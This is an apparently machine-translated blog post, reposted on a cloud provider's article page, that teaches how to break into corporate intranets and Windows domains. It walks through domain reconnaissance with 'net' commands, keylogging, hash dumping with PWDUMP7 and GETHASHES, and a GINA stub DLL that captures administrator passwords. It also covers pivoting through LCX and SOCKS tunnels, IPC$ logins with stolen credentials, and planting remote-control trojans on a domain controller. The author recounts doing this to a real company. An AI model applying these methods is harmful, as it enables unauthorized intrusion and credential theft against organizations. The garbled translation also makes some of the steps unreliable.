Summary of General Intranet penetration ideas

Source: Internet
Author: User
Tags net command

Relatively speaking, there is little information on the Internet, and few people write some detailed information about the Intranet penetration for the reference of their peers. Today, I am only going to give a general introduction to some Intranet knowledge.

First, under what circumstances will we meet the Intranet? If your goal is only limited to a small WEB, you do not need to consider the Intranet at all. However, if you target a large WEB or company, you must consider the Intranet.

During our Penetration Process, many external websites or servers on large networks are not necessarily useful. Of course, the Internet can also serve as a breakthrough. After all, we have not tried it, we do not know the structure in it. At least we can obtain some external information.

The information may be the same, but for the Intranet, the Internet is definitely not our main path. In many cases, it is increasingly difficult for us to access the Intranet directly from the Internet.

What should we do for the Intranet? What is available? Or some methods? Next, let's discuss it together.

Penetration is a collection of information, classified archiving, and technical use to achieve the goal.

When we get an intranet machine, the first thing we need to do is to collect information. What information? Many...

1. Collect information.

1-1. No matter how the Intranet machine is obtained, after determining its internal network, we should first understand the personnel of this machine. If our goal is the company, then we need to know the position of this person in the company, his identity, his rights, and his permissions on the Intranet. As a large company, a person with high permissions needs to use many things in the internal network. Therefore, the permissions of a person with high permissions will be much higher than that of ordinary employees, this is common in my Penetration Process.

Now that he has his machine, it is necessary to flip over his computer. If you say how to flip it, you can try to get familiar with his computer, or even better than him, then you can learn more about it. A personal computer, from which some information related to his own, and a large amount of company information should be no problem, unless it is a new computer.

1-2. I have learned a certain amount of personnel information. During this period, you should write down the important data such as the account and password you have mastered and use them for a certain amount of time. Therefore, before you penetrate into the system, you may wish to create a notebook to save important information. Writing a notebook won't waste much time.

Next, we should have a certain understanding of this network. Is it a general Intranet or a domain? Generally, a large company uses a domain. We only need to check it and find out that to penetrate into it, you must understand its network topology. Of course, we cannot understand things that are too specific physically. We can only understand what we know. Whether it's INT, DMZ, or LAN, we have to be familiar with it. Here, we will use some commands, and we believe everyone should be familiar with them.

Ipconfig/all queries some situations of the local machine. The IP segment gateway does not belong to the domain.

Net view to query some associated machines, which are usually displayed in the machine name. We need to PING the IP addresses of these machines. One is to facilitate the query of the IP addresses of important machines, and the other is to facilitate the query of several segments.

Net view/domain query has several domains, because there are generally more than one domain in a large network

Net group/domain query groups in the domain

Net user/domain query domain users

Net group "domain admins"/domain query domain management user groups

These are all things we need to know. Of course, sometimes we need to query some more information. You will find them under the NET command. I don't need to repeat them. The specific situation is analyzed in detail.

2. Information Archiving

2-1. When information is available, we need to archive the information to a certain extent and archive the IP corresponding to each machine name, so that it will not be messy during convenient use.

2-2. The queried user and administrator must be archived.

2-3. valuable information that may occur during query must be archived.

3. Technical Utilization

3-1, whether it is recorded through the keyboard. For HASH capturing, We need to store all the key data in the account, password, and email address. On the one hand, we need to prepare the information for penetration, and on the other hand, prevent the current attackers from dropping the data.

3-1-1. Use Remote Control Key records for capturing.

3-1-2. Use PWDUMP7 or GETHASHES to capture the HASH and crack it. GETHASHES V1. After 4, all the HASH values of the domain can be captured.

3-1-3. Use GINASTUB. DLL to obtain the Administrator account and password. Because the domain administrator has the permission to log on to any machine. The password is easy to record. After INSTALL, a faxmode is generated under SYSYTEM32. INC file record password.

3-2. With the Intranet, we do not need to directly operate many things on the current machine. Although others are on the Intranet, it does not mean that there is no defense system, it is necessary to set up SOCKS or VPN. I believe everyone will do it.

3-2-1. I recommend VIDC, which is very convenient. Run VIDC directly in CMD. EXE-D-p port.

3-2-2. Use LCX on the slave machine and LCX under CMD. EXE-SLAVE server ip port 127. 0. 0. 1 PORT, and then go to the server CMD and then LCX. EXE-LISTEN Server ip port arbitrary PORT.

3-2-3. After SOCKS is set up, you can use SOCKSCAP to connect locally. After the connection is successful, you can perform this operation on your own.

Basically, we can only operate so much, and there is no technical reuse or exploitation in the future. However, there are a lot of experience in this process, and there are also a lot of details to deal.

What if we get an intranet machine that has a domain but does not use a domain account? Then we can only query or do everything we can to get his usual account password, then use this account password, and then enter the domain through SOCKS. In this case, it is necessary for your peers to view and control machine files, as well as record passwords, GINA, and HASH cracking.

What should we do after entering the domain, and what should we do after SOCKS is created. We can throw S to check the main port. We can try a weak password on the port. We can detect the Intranet WEB in many ways, you can even use MS08-067 to break through another machine, but believe me, most of the machines that can use domain are patched. We can use very little, but cannot be discouraged. As long as we can shuttle through the Intranet, we will at least be much easier in defense. What we need is patience and time.

Once we have a password, we can try the IPC connection and directly win the domain. It depends on how much permission you have.

Net use \ IPipc $ password/user: username @ domain

We recommend that you enter your account and password in this way. Why? If there is a space in the user name, It will be safer if you lose. What domain users cannot have spaces?

Yes, I used to think no, nor did Microsoft's lecturers say no. However, after my tests and experience, it is false. The domain can be completely blank, except for the user name, user na me still exists. If you don't believe it, try it. After the IPC is created, you just want to COPY the file, rarfile, or stallion, which is your freedom.

Afterwards: recently, due to the penetration of the domain, some problems occurred during the Penetration Process. Several times I did not know how to proceed. In fact, there is no technical obstacle. The main reason is that the other party has a strong primary defense, and my remote control was unable to execute CMD at first. After several days of environment testing, it broke through CMD. With CMD, I made a query and obtained some information, and then began to penetrate down. I did not run the password of the controlled machine, I flipped through his files and pulled out his common password. Because he does not use a domain account, he logs in as a system account, so he cannot view the domain. I can only use his domain account to establish an IPC connection, find a WEB service on the Intranet, and penetrate it into it to win a stable Intranet machine.

After I took the Intranet WEB server, I was completely in the DOMAIN and didn't use hash injection. I first queried DOMAIN ADMINS and found that the account on the WEB server belongs to this group, PW and then get the HASH, and I even went to the domain control server's IPC $.

Connected to IPC $, directly threw a remote control under its SYSYTEM32, and then started it with the AT command. During this period, I tried five shifts, but after SHIFT was disabled, my remote control will also fall, so it is more convenient to use AT to add new job if this method is ruled out.

Remote control is provided to the domain control server. CMD is used to GETHASHES all the HASHES for cracking. Fortunately, the users in the file management group are found, and the goal behind me is achieved.

In general, this penetration is a good luck, and there are not too many troubles in the middle. However, it took me half a month to spend most of my time in testing the defense environment and eliminating software sales, trojan-free, search for information above.

Later, I obtained his network extension diagram and found that the region I stayed in was just a small domain, and there were several other domains that I did not involve. In front of the domain was DMZ, the front of DMZ is of course INT.

It was very late. I was writing a detailed Penetration Process. However, because I have been working for a long time, I cannot record many details on the spot. Therefore, I can write something I can think of on the BLOG for the time being, if the environment is available later, more details will be added, as well as the image and the troubles encountered during penetration, and how to solve the problems.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.